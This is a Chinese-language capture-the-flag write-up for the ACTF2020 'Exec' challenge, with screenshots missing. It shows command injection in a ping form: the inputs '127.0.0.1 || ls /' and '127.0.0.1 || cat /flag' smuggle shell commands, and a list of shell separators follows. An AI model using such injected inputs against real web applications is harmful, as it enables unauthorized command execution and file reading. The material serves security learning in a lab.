[ACTF2020 新生赛]Exec

打开界面是这个样子

image-20210617233558179

ping一下本机试试

127.0.0.1

image-20210617233635437

说明能执行命令

带点私货试试

127.0.0.1 || ls /

image-20210617233736239

发现成功执行,下一步获取flag

127.0.0.1 || cat /flag

image-20210617233818719

补充资料

1、|(就是按位或),直接执行|后面的语句

image-20210617234040014

2、||(就是逻辑或),如果前面命令是错的那么就执行后面的语句,否则只执行前面的语句

image-20210617234003497

3、&(就是按位与),&前面和后面命令都要执行,无论前面真假

image-20210617234104782

4、&&(就是逻辑与),如果前面为假,后面的命令也不执行,如果前面为真则执行两条命令
这里没试出来flag,用cmd试一下:

image-20210617234234201

5、;(linux下有的,和&一样的作用)

命令执行漏洞可以看这位师傅的博客:
http://www.ghtwf01.cn/index.php/archives/273/

最后修改:2021 年 06 月 17 日 11 : 44 PM
如果觉得我的文章对你有用,请随意赞赏